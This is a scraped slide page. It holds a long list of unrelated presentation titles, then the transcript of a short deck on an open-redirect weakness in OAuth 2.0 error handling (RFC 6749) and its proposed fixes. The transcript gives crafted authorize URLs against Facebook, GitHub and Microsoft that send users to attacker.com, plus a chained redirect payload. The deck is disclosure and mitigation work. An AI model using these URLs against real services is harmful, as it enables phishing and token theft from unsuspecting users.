J. Bradley Sanso H. Tschofenig

Slides:

Advertisements

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Advertisements

PHP syntax basics. Personal Home Page This is a Hypertext processor It works on the server side It demands a Web-server to be installed.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.

Prabath Siriwardena | Johann Nallathamby.

Bypassing Client-Side Protection CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University

Hannes Tschofenig (IETF#79, SAAG, Beijing). Acknowledgements I would like to thank to Pasi Eronen. I am re- using some of his slides in this presentation.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Measuring DANE TLSA Deployment Liang Zhu 1, Duane Wessels 2, Allison Mankin 2, John Heidemann 1 1. USC ISI 2. Verisign Labs 1.

Web Hacking 1. Overview Why web HTTP Protocol HTTP Attacks 2.

Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

SIP OAuth Rifaat Shekh-Yusef IETF 90, SIPCore WG, Toronto, Canada July 21,

Creating a User ID (1) User makes any HTTP request

NMD202 Web Scripting Week3. What we will cover today Includes Exercises PHP Forms Exercises Server side validation Exercises.

OWASP Top Ten #1 Unvalidated Input. Agenda What is the OWASP Top 10? Where can I find it? What is Unvalidated Input? What environments are effected? How.

IETF 60 – San Diegodraft-ietf-mmusic-rfc2326bis-07 Magnus Westerlund Real-Time Streaming Protocol draft-ietf-mmusic-rfc2326bis-07 Magnus Westerlund Aravind.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Beyond negative security Signatures are not always enough Or Katz Trustwave ot.com/

Department of Computer Science & Engineering San Jose State University

SQL INJECTIONS Presented By: Eloy Viteri. What is SQL Injection An SQL injection attack is executed when a web page allows users to enter text into a.

Building Secure Web Applications With ASP.Net MVC.

Omar A. Abouabdalla Network Research Group (USM) SIP – Functionality and Structure of the Protocol SIP – Functionality and Structure of the Protocol By.

THE DEVIL IS IN THE (IMPLEMENTATION) DETAILS: AN EMPIRICAL ANALYSIS OF OAUTH SSO SYSTEMS SAN-TSAI SUN & KONSTANTIN BEZNOSOV PRESENTED BY: NAZISH KHAN COMPSCI.

Deconstructing API Security

CS526Topic 12: Web Security (2)1 Information Security CS 526 Topic 9 Web Security Part 2.

Mr. Justin “JET” Turner CSCI 3000 – Fall 2015 CRN Section A – TR 9:30-10:45 CRN – Section B – TR 5:30-6:45.

Web2.0 Secure Development Practice Bruce Xia

SAML for SIP Hannes Tschofenig, Jon Peterson, James Polk, Douglas Sicker, Marcus Tegnander.

Copyright © The OWASP Foundation This work is available under the Creative Commons SA 2.5 license The OWASP Foundation OWASP Denver February 2012.

Web Server Design Week 12 Old Dominion University Department of Computer Science CS 495/595 Spring 2010 Martin Klein 3/31/10.

7/11/2005ECRIT Security Considerations1 ECRIT Security Considerations draft-taylor-ecrit-security-threats-00.txt Henning Schulzrinne, Raj Shanmugam, Hannes.

PHP: Further Skills 02 By Trevor Adams. Topics covered Persistence What is it? Why do we need it? Basic Persistence Hidden form fields Query strings Cookies.

Heat-seeking Honeypots: Design and Experience John P. John, Fang Yu, Yinglian Xie, Arvind Krishnamurthy and Martin Abadi WWW 2011 Presented by Elias P.

SAP GRC(Governance Risk and Compliance)/SECURITY ONLINE TRAINING  Magnific Name : SAP GRC/SECURITY 24*7 Technical support  faculty : Real time Experience.

SECURE DEVELOPMENT. SEI CERT TOP 10 SECURE CODING PRACTICES Validate input Use strict compiler settings and resolve warnings Architect and design for.

DNS Security Risks Section 0x02. Joke/Cool thing traceroute traceroute c

Understand Protection LESSON Security Fundamentals.

HyperText Transfer Protocol HTTP v1.1 hussein suleman uct cs honours 2009.

Unvalidated Redirects & Forwards

Building Secure ColdFusion Applications

CSCE 548 Student Presentation Ryan Labrador

Web Application Vulnerabilities, Detection Mechanisms, and Defenses

Securing Your Web Application in Azure with a WAF

Phil Hunt, Hannes Tschofenig

CS320 Web and Internet Programming Generating HTTP Responses

Hypertext Transfer Protocol

Johnson, Baismall, Andre

Authentication & .htaccess

API Security Auditing Be Aware,Be Safe

OAuth2 WG User Authentication for Clients

CS3220 Web and Internet Programming Generating HTTP Responses

Consistent URIs For Compliance Checking (1)

What is REST API ? A REST (Representational State Transfer) Server simply provides access to resources and the REST client accesses and presents the.

SSOScan: Automated Testing of Web Applications for Single Sign-On Vulnerabilities Yuchen Zhou, and David Evans 23rd USENIX Security Symposium, August,

Device Flow <draft-ietf-oauth-device-flow-03>

Internet Control Message Protocol (ICMP)

Web Server Design Week 12 Old Dominion University

Web Server Design Week 15 Old Dominion University

Agenda OAuth Concepts Programming OAuth.

Hypertext Transfer Protocol

Web Server Design Week 13 Old Dominion University

Office 365 Development.

Web Server Design Week 13 Old Dominion University

Web Server Design Week 13 Old Dominion University

Unemployment Insurance Agency Michigan Web Account Manager

Web Server Design Week 11 Old Dominion University

Web Server Design Week 14 Old Dominion University

Web Programming Week 1 Old Dominion University

Presentation transcript:

J. Bradley Sanso H. Tschofenig Open redirect in rfc6749 J. Bradley Sanso H. Tschofenig

The Specification rfc6 749 – section 4.1.2.1 If the request fails due to a missing, invalid, or mismatching redirection URI, or if the client identifier is missing or invalid, the authorization server SHOULD inform the resource owner of the error and MUST NOT automatically redirect the user-agent to the invalid redirection URI. If the resource owner denies the access request or if the request fails for reasons other than a missing or invalid redirection URI, the authorization server informs the client by adding the following parameters to the query component of the redirection URI using the "application/x-www-form-urlencoded" format,

The Problem Open Redirect OWASP TOP 10 …an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.

The Attack The attacker Registers a new client to the victim.com provider Registers a redirect uri like attacker.com Craft a special URI of the form (with a wrong scope) http://victim.com/authorize?response_type=code&cli ent_id=bc88FitX1298KPj2WS259BBMa9_KCfL3&scope=WRON G_SCOPE&redirect_uri=http://attacker.com

Live Examples Facebook: https://graph.facebook.com/oauth/authorize?response_type=code&c lient_id=1621835668046481&redirect_uri=http://www.attacker.com/ &scope=WRONG_SCOPE Github: https://github.com/login/oauth/authorize?response_type=code&red irect_uri=http://attacker.com2&client_id=e2ddb90328315c367b11 Microsoft: https://login.live.com/oauth20_authorize.srf?response_type=code &redirect_uri=http://attacker.com&client_id=000000004C12822C

Security Compromise: The Authorization Server As Open Redirector https://AUTHORIZATION_SERVER/authorize?response_type=token &client_id=good-client&scope=VALID_SCOPE &redirect_uri=https%3A%2F%2AUTHORIZATION_SERVER%Fauthorize %3Fresponse_type%3Dcode %26client_id%3Dattacker-client-id %26scope%3DINVALID_SCOPE %26redirect_uri%3Dhttps%253A%252F%252Fattacker.com

The Mitigation https://tools. ietf Respond with an HTTP 400 (Bad Request) status code (rather than 302) Perform a redirect to an intermediate URI under the control of the AS to clear referer The fragment "#_=_" MUST be appended to the error redirect URI.